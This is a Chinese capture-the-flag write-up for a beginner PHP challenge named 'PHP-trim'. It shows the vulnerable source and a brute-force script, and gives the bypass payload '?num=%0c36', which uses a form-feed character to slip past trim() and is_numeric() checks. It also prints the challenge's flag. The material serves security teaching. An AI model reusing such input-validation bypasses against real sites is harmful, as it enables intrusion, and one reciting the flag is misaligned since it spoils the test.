[题目信息]：

题目名称	题目难度
PHP-trim	1

[题目考点]：

trim() 函数移除字符串两侧的空白字符或其他预定义字符。

[Flag格式]:

SangFor{dl9hFiITmhQNAJysCgigAskyCZ6kQaDc}

[环境部署]：

docker-compose.yml文件或者docker tar原始文件。

http://分配ip:2059

[题目writeup]：

1、实验主页

2、源码分析

<?php
include('flag.php');
highlight_file(__FILE__);
error_reporting(0);
function filter($num){$num=str_replace("0x","1",$num);$num=str_replace("0","1",$num);$num=str_replace(".","1",$num);$num=str_replace("e","1",$num);$num=str_replace("+","1",$num);return $num;
}
$num=$_GET['num'];
if(is_numeric($num) and $num!=='36' and trim($num)!=='36' and filter($num)=='36'){if($num=='36'){echo $flag;}else{echo "hacker!!";}
}else{echo "hacker!!!";
} 

分析代码逻辑，使用了自定义函数filter()对$num进行过滤，将0x，0，e等字符替换为了1。这意味着将无法使用16进制，8进制等方法进行绕过。

is_numeric函数来判断用户输入是否为数字，并且if条件里规定trim($num)移除字符串两侧的字符不能等于36，但后面的if需要等于36才能输出flag。

此时可以编写脚本查看哪些字符可以使用

<?php
for ($i = 0; $i <= 128; $i++) {$a = chr($i) . '36';if (trim($a) !== '36' && is_numeric($a)) {echo urlencode(chr($i)) . "\n";}
}

发现%0C，也就是\f分页符可以利用，不会被trim过滤掉，所以payload为

?num=%0c36